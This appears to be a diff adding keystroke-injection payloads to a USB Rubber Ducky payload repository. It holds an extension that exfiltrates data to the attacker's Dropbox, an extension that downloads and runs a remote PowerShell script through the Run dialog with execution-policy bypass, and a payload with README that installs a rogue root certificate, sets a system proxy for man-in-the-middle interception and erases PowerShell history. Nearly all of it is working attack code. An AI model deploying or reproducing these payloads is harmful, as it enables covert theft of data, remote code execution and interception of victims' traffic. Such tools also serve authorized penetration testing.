New Payloads and Extensions

payloads/extensions/community/POWERSHELL_TO_DROPBOX

@@ -0,0 +1,43 @@
+EXTENSION POWERSHELL_TO_DROPBOX
+    REM_BLOCK DOCUMENTATION
+        Title: PowerShell To Dropbox
+        Author: PlumpyTurkey
+        Description: This extension allows you to exfiltrate content available from PowerShell to a file in your Dropbox.
+        Target: Windows 10, 11
+        Version: 1.1
+    END_REM
+
+    REM Required options:
+    DEFINE #PTD_CONTENT $Content
+    DEFINE #PTD_REFRESH_TOKEN XXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXX
+    DEFINE #PTD_APP_KEY XXXXXXXXXXXXXXX
+    DEFINE #PTD_APP_SECRET XXXXXXXXXXXXXXX
+
+    REM Advanced options:
+    DEFINE #PTD_OUTPUT_FOLDER Exfiltrated-content
+    DEFINE #PTD_OUTPUT_FILE [${env:COMPUTERNAME}-${env:USERNAME}].txt
+
+    FUNCTION PTD_SEND()
+        STRING_POWERSHELL
+            try { 
+                Invoke-RestMethod -Uri "https://content.dropboxapi.com/2/files/upload" -Method Post -Headers @{ 
+                    "Authorization" = "Bearer $((
+                    Invoke-RestMethod -Uri "https://api.dropboxapi.com/oauth2/token" -Method Post -Headers @{ 
+                        "Content-Type" = "application/x-www-form-urlencoded" 
+                    } -Body @{ 
+                        "grant_type" = "refresh_token"; 
+                        "refresh_token" = "#PTD_REFRESH_TOKEN"; 
+                        "client_id" = "#PTD_APP_KEY"; 
+                        "client_secret" = "#PTD_APP_SECRET" 
+                    }
+                ).access_token)"; 
+                    "Content-Type" = "application/octet-stream"; 
+                    "Dropbox-API-Arg" = "{""path"":""/#PTD_OUTPUT_FOLDER/#PTD_OUTPUT_FILE"",""mode"":""add"",""autorename"":true,""mute"":false}" 
+                } -Body #PTD_CONTENT | Out-Null 
+            } 
+            catch { 
+                Write-Host "An error occurred: $_" 
+            }
+        END_STRING
+    END_FUNCTION
+END_EXTENSION

payloads/extensions/community/RUN_HOSTED_POWERSHELL

@@ -0,0 +1,34 @@
+EXTENSION RUN_HOSTED_POWERSHELL
+    REM_BLOCK DOCUMENTATION
+        Title: Run Hosted PowerShell
+        Author: PlumpyTurkey
+        Description: This extension executes a hosted PowerShell script using the Windows Run dialog box.
+        Target: Windows 10, 11
+        Version: 1.0
+    END_REM
+
+    REM Required options:
+    DEFINE #RHP_SCRIPT_URL example.com
+
+    REM Advanced options:
+    DEFINE #RHP_DELAY 2000
+    DEFINE #RHP_ELEVATED_EXECUTION FALSE
+    DEFINE #RHP_DISABLE_AFTER_EXECUTION FALSE
+
+    GUI r
+
+    DELAY #RHP_DELAY
+    STRING PowerShell -W H -EX Bypass "IWR -UseB '#RHP_SCRIPT_URL' | IEX"
+
+    IF_DEFINED_TRUE #RHP_ELEVATED_EXECUTION
+        CTRL SHIFT ENTER
+        DELAY #RHP_DELAY
+        LEFT
+    END_IF_DEFINED
+
+    ENTER
+
+    IF_DEFINED_TRUE #RHP_DISABLE_AFTER_EXECUTION
+        ATTACKMODE OFF
+    END_IF_DEFINED
+END_EXTENSION

payloads/library/execution/Windows-Duck-In-The-Middle/README.md

@@ -0,0 +1,59 @@
+# Windows Duck In The Middle
+
+<p>
+    <a href="https://payloadstudio.hak5.org/community/?device=usb-rubber-ducky&viewurl=https://raw.githubusercontent.com/hak5/usbrubberducky-payloads/master/payloads/library/execution/Windows-Duck-In-The-Middle/payload.txt">
+        <img alt="VIEW ON: HAK5 PAYLOADSTUDIO" src="https://img.shields.io/badge/VIEW_ON-HAK5_PAYLOADSTUDIO-red?style=for-the-badge">
+    </a>
+    <a href="#">
+        <img alt="TARGET: WINDOWS 10, 11" src="https://img.shields.io/badge/TARGET-WINDOWS_10,_11-blue?style=for-the-badge">
+    </a>
+    <a href="#">
+        <img alt="VERSION: 1.0" src="https://img.shields.io/badge/VERSION-1.0-green?style=for-the-badge">
+    </a>
+</p>
+
+This payload sets up a trustworthy proxy for the user, enabling a [Man-in-the-middle attack](https://en.wikipedia.org/wiki/Man-in-the-middle_attack). After executing your payload, the proxy server will intercept all the target user's network traffic.
+
+## Process
+
+1. Detects when the USB Rubber Ducky is ready and whether the target operating system is Windows.
+2. Creates a new virtual desktop.
+3. Opens a PowerShell window using the Windows+X menu.
+4. Runs PowerShell code that performs the following actions:
+- Downloads your certificate to a temporary file.
+- *Configures Firefox to accepts root user certificates for each profile.*
+- Configures and activates the proxy for the current user.
+- Deletes the temporary certificate file and PowerShell history, then closes the window.
+5. Confirms the addition of a trusted certificate in the confirmation dialog box.
+6. Closes the virtual desktop.
+7. *Disables USB Rubber Ducky*
+
+> [!NOTE]
+> No configuration is required for Chromium-based browsers since they accept user root certificates by default.
+
+## Prerequisites
+
+To use this payload, you'll need a proxy server and a [root certificate](https://en.wikipedia.org/wiki/Root_certificate). The certificate must be downloadable from a website, either from your proxy server or from an online file hosting service such as [Dropbox](https://www.dropbox.com/). You can easily generate the certificate using tools such as [mitmproxy](https://mitmproxy.org/) or [Burp Suite](https://portswigger.net/burp).
+
+> [!WARNING]
+> To ensure the payload functions properly, generate the "mitmproxy-ca-cert.pem" certificate in the "Other platforms" section when using mitmproxy.
+
+## Options
+
+|Required options|Data type|Default value|Description|
+|-|-|-|-|
+|CERT_URL|String|example.com|The download link for your Trusted Root CA certificate|
+|PROXY_IP|String|127.0.0.1|Your proxy's IP address|
+|PROXY_PORT|Integer|8080|Your proxy port|
+
+|Advanced options|Data type|Default value|Description|
+|-|-|-|-|
+|SHORT_DELAY|Integer|500|Short delay time|
+|MEDIUM_DELAY|Integer|2000|Medium delay time|
+|LONG_DELAY|Integer|4000|Long delay time|
+|CONFIGURE_FIREFOX|Boolean|TRUE|Configures Firefox to accepts root user certificates for each profile|
+|DISABLE_AFTER_EXECUTION|Boolean|TRUE|Disables USB Rubber Ducky after payload execution|
+
+## Contributors
+
+- [PlumpyTurkey](https://codeberg.org/PlumpyTurkey)

payloads/library/execution/Windows-Duck-In-The-Middle/payload.txt

@@ -0,0 +1,136 @@
+REM_BLOCK DOCUMENTATION
+    Title: Windows Duck In The Middle
+    Author: PlumpyTurkey
+    Description: This payload sets up a trustworthy proxy for the user, enabling a Man-in-the-middle attack.
+    Target: Windows 10, 11
+    Version: 1.0
+    Category: Execution
+END_REM
+
+REM Required options:
+DEFINE #CERT_URL example.com
+DEFINE #PROXY_IP 127.0.0.1
+DEFINE #PROXY_PORT 8080
+
+REM Advanced options:
+DEFINE #SHORT_DELAY 500
+DEFINE #MEDIUM_DELAY 2000
+DEFINE #LONG_DELAY 4000
+DEFINE #CONFIGURE_FIREFOX TRUE
+DEFINE #DISABLE_AFTER_EXECUTION TRUE
+
+EXTENSION PASSIVE_WINDOWS_DETECT
+    REM VERSION 1.1
+    REM AUTHOR: Korben
+
+    REM_BLOCK DOCUMENTATION
+        Windows fully passive OS Detection and passive Detect Ready
+        Includes its own passive detect ready.
+        Does not require additional extensions.
+
+        USAGE:
+            Extension runs inline (here)
+            Place at beginning of payload (besides ATTACKMODE) to act as dynamic
+            boot delay
+            $_OS will be set to WINDOWS or NOT_WINDOWS
+            See end of payload for usage within payload
+    END_REM
+
+    REM CONFIGURATION:
+    DEFINE #MAX_WAIT 150
+    DEFINE #CHECK_INTERVAL 20
+    DEFINE #WINDOWS_HOST_REQUEST_COUNT 2
+    DEFINE #NOT_WINDOWS 7
+
+    $_OS = #NOT_WINDOWS
+
+    VAR $MAX_TRIES = #MAX_WAIT
+    WHILE(($_RECEIVED_HOST_LOCK_LED_REPLY == FALSE) && ($MAX_TRIES > 0))
+        DELAY #CHECK_INTERVAL
+        $MAX_TRIES = ($MAX_TRIES - 1)
+    END_WHILE
+    IF ($_HOST_CONFIGURATION_REQUEST_COUNT > #WINDOWS_HOST_REQUEST_COUNT) THEN
+        $_OS = WINDOWS
+    END_IF
+
+    REM_BLOCK EXAMPLE USAGE AFTER EXTENSION
+        IF ($_OS == WINDOWS) THEN
+            STRING HELLO WINDOWS!
+        ELSE
+            STRING HELLO WORLD!
+        END_IF
+    END_REM
+END_EXTENSION
+
+EXTENSION WINDOWS_ONLY 
+    REM VERSION 1.0
+    REM AUTHOR: Korben
+
+    DEFINE #FAILURE_LED TRUE
+    DEFINE #FAILURE_LED_MODE LED_R
+    DEFINE #FAILURE_ATTACKMODE ATTACKMODE OFF
+
+    IF (($_OS == WINDOWS) == FALSE) THEN
+        IF_DEFINED_TRUE #FAILURE_LED
+            #FAILURE_LED_MODE
+            DELAY 500
+            #FAILURE_LED_MODE
+            DELAY 500
+            #FAILURE_LED_MODE
+        END_IF_DEFINED
+        #FAILURE_ATTACKMODE
+        STOP_PAYLOAD
+    END_IF
+END_EXTENSION
+
+CTRL GUI d
+GUI x
+
+DELAY #SHORT_DELAY
+STRING i
+
+DELAY #MEDIUM_DELAY
+STRING_POWERSHELL
+    Clear-Host; 
+    $c = New-TemporaryFile; 
+    try { 
+        Invoke-WebRequest -UseBasicParsing -Uri "#CERT_URL" -OutFile $c; 
+        Import-Certificate -FilePath $c -CertStoreLocation "Cert:\CurrentUser\Root"; 
+END_STRING
+
+IF_DEFINED_TRUE #CONFIGURE_FIREFOX
+    STRING_POWERSHELL
+            if (Test-Path "$env:APPDATA\Mozilla\Firefox\Profiles") { 
+                Get-ChildItem -Path "$env:APPDATA\Mozilla\Firefox\Profiles" -Filter "prefs.js" -Recurse | ForEach-Object { 
+                    (Get-Content $_.FullName) -replace '"security.enterprise_roots.enabled", false','"security.enterprise_roots.enabled", true' | Set-Content $_.FullName 
+                } 
+            }; 
+    END_STRING
+END_IF_DEFINED
+
+STRING_POWERSHELL
+        @{ "ProxyServer" = "#PROXY_IP:#PROXY_PORT"; "ProxyEnable" = "1" }.GetEnumerator() | ForEach-Object { 
+            Set-ItemProperty -Path "HKCU:\Software\Microsoft\Windows\CurrentVersion\Internet Settings" -Name $_.Name -Value $_.Value 
+        } 
+    } 
+    finally { 
+        Remove-Item $c; 
+        Remove-Item (Get-PSReadLineOption).HistorySavePath; 
+        exit 
+    }
+END_STRING
+
+ENTER
+
+DELAY #LONG_DELAY
+ALT TAB
+
+DELAY #SHORT_DELAY
+TAB
+ENTER
+
+CTRL GUI F4
+
+IF_DEFINED_TRUE #DISABLE_AFTER_EXECUTION
+    ATTACKMODE OFF
+END_IF_DEFINED